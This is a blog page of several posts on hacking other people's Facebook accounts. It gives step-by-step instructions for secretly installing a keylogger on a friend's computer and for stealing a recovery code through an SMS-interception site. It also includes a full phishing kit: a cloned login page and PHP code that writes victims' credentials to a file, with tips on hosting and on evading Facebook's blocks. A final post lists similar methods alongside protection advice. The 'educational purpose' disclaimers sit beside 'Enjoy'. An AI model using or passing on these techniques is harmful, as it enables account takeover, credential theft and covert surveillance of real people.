Wednesday 23 July 2014

HACK FACEBOOK PASSWORD USING KEYLOGGER


In my previous article, i have given a small introduction to keyloggers. You can read it from here
In this article i am going to show you how you can monitor your computer using  REFOG keylogger.


Requirements:

      REFOG keylogger

Concept:

This is a software you have to install on your computer. It sends all the keystrokes,screenshots to your mail box and thus you can easily hack  anyone's account by simply installing this keylogger.

Procedure:

First download keylogger and install it.
You can download it from here.
After installing follow the steps as shown in the screen shots.









Here enter the following information

              5-minutes
Email - your email address.
Account password - Your email password
Email-sender-Your email address.

and finally click test.



Now it sends an email to your email id to test whether it is working or not.


After clicking "OK" verify your email id. you shoul receive an email from it.
Then follow the steps again.


This is the important window. Here you can specify your HOT KEY to see the logs on your system when you dont have internet.


This is the important window. Here you can specify your HOT KEY to see the logs on your system when you dont have internet.



And finally click finish.
Now if you want to see your logs, just press the HOT KEY you have specified in the above steps.
It opens a window where you can see all the functions of your keylogger.
I kept a screenshot of KEYSTROKE logging here..



You can install this keylogger on your friend's system and can hack his accounts.
The disadvantage is you should have physical access to your friend's computer.
I will write an article on remote installation keylogger soon.


Hope you liked it.If you have any doubts or suggestions leave a comment.


** How to hack facebook using Just a Mobile Number **




NOTE - THIS ARTICLE IS ONLY FOR EDUCATIONAL PURPOSE, HACKING FACEBOOK HAS BEEN DECLARED ILLEGAL IN MANY COUNTRIES INCLUDING INDIA, IN CASE OF ANY HARM ""YOU WILL BE SOLELY RESPONSIBLE FOR IT""

Materials Required
1) Mobile Number of The Victim...
2) Internet
3) A suitable time when the victim is away from the phone ie while sleeping or at work...

Procedure :
1) Open Facebook
2) Now click on forget password. now you will be redirected to a page asking you to put the mobile no or e-mail account to find your account. search victim's account using his/her phone number.
3) Now you will see two options, click on the second saying send a text to
..********...
mark the 2nd and click on continue
4) now open http://sms-peeper.com/ and enter the required informations
including the name victim's country, his mobile number and any e-mail id (IO recommend yours)
5) finally click on GET MESSAGES and soon you will receive 100 messages. Open the recent one which is a Recovery Code By Facebook And Will Help you to Reset new password to Victim's ID

Enjoy  


Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/tutorial-hacking-facebook-using-phishing-method-fake-facebook-website/#sthash.PjLx3HF


Step by Step Tutorial Hacking Facebook using Phishing Method :


Phishing is the method to hack the victim by creating a Fake login page
and Uploading it to a webhosting site so when Victim enters his E-mail
Id and Password we get it.
How to Do Phishing
note - This Article is only for educational Purpose I won't be
Responcible for any Harm done by you.
The Process is divided into three parts -: First to create a Fake Login
Page, than Uploading it on a Web Hosting Site and than Hacking the
Victim.
* Craeting A Fake Login page *1) Open google chrome
2) Open Facebook
3)
Now right click anywhere on the White part and than click on "View Page
Source". A webpage will open in New Tab, Press Ctrl+A and Copy(Ctrl +
c) Everything.
4) Open Notepad and paste(Ctrl + V)
5) Now press Ctrl+F
(Serach) and search for "Action", if you're unable to find Action, keep
on searching up and down.
6) Now we have to change something. you have
searched action,,in this line is written
as-“https//www.facebook.com/login.php?login_attempt=1”, you have to
change this and write ‘‘password.php’’ and next to this something is
written as ‘method="post"’ change this and write ‘‘get’’ in place of
‘‘post’’ i.e. method="get" so this is now action="password.php"
method="get". 7) Now save it with name login.html
Now copy this and paste in notepad-
<?php
header("Location: http://www.phisshed-website. com");
$handle = fopen("vandematram.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>
Write the name of website in place of http://www.phisshed-website. com
on which you are phishing,,so you can write -
<?php
header("Location: http://www.facebook.com");
$handle = fopen("vandematram.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>
Save it with name password.php
Open notepad again and save empty notepad file with name “vandematram”.

Now we have 3 files-login.html,password.php,vandematram.txt
Uploading These Files To any Free Webhosting Site
Here are some free Web Hosting Sites
110mb
Ripway
SuperFreeHost
My3gb
Heliohost
freehostia
Freeweb7
Sign up on any of these Websites and Upload all the three Files such
that Login.html is on top, password.php on middle and Vandematram on
last.
* Hacking The Victim *
1)Go to your Webhosting account (Login), Right click on the Login File
ie Login.html and than left click on Copy Link Address
2) Now you have to
play a little game with victim, give him the link of that
File(Login.html) and make him login to that file(once he click on the
file he will be redirected to that fake login page), its depend on you
how you do it.
3) Once the victim login with that fake page, visit your
webhosting account again, open the file Vandematram, You will get both
E-Mail ID and password of Victim...
Enjoy 
Note :-1) Facebook have blocked most of the webhosting site, so, if
possible try to give the link to victim outside FB ie via SMS or
something like this
2) Do send the Link to victim before 24 hours because
nowadays Web hosting sites delete Phishing account after 24 hrs.
3)
sometimes password.php, after uploading turns into password.php.txt if
it happens change it to password.php
Do hit like on this note if you like it
f

Tuesday 22 July 2014


HOW TO HACK FACEBOOK ACCOUNT

 
 
Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over one billion monthly active users as of October 2012—and around 600 million active daily users.
We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. We even clamor to see the latest versions even before they're ready for primetime.
But we sometimes forget who's watching.
We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.


 





 
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into someone's Facebook account.
It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilĂ —you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1: Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.
  • The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
  • Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
  • It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
  • It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
  • It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
  • If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.
 
It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.




How to Protect Yourself

  • Use an email address specifically for your Facebook and don't put that email address on your profile.
  • When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
  • Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.

 

 
 



Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

 
 

How to Protect Yourself

  • Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
  • Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
  • Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
  • Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.


 
The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

  • Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
  • Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
  • Use anti-virus & web security software, like Norton or McAfee.

Method 4: Stealing Cookies

Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.



Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.
From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

How to Protect Yourself

  • On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
  • Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
  • Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
  • Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
  • Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.

Protecting Yourself: Less Is More

Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.
Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.
If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.
Bonus: If you're interested in who's checking you out, there are some ways you can (kindof) track who's viewed your Facebook profile.

More Password-Hacking Guides

For more info on cracking passwords, check out our guides on hacking Linux passwords, hacking Windows passwords, and our super-easy beginner's guide on hacking Wi-Fi passwords (or for newer wireless routers, how to crack WPA2-PSK wifi passwords).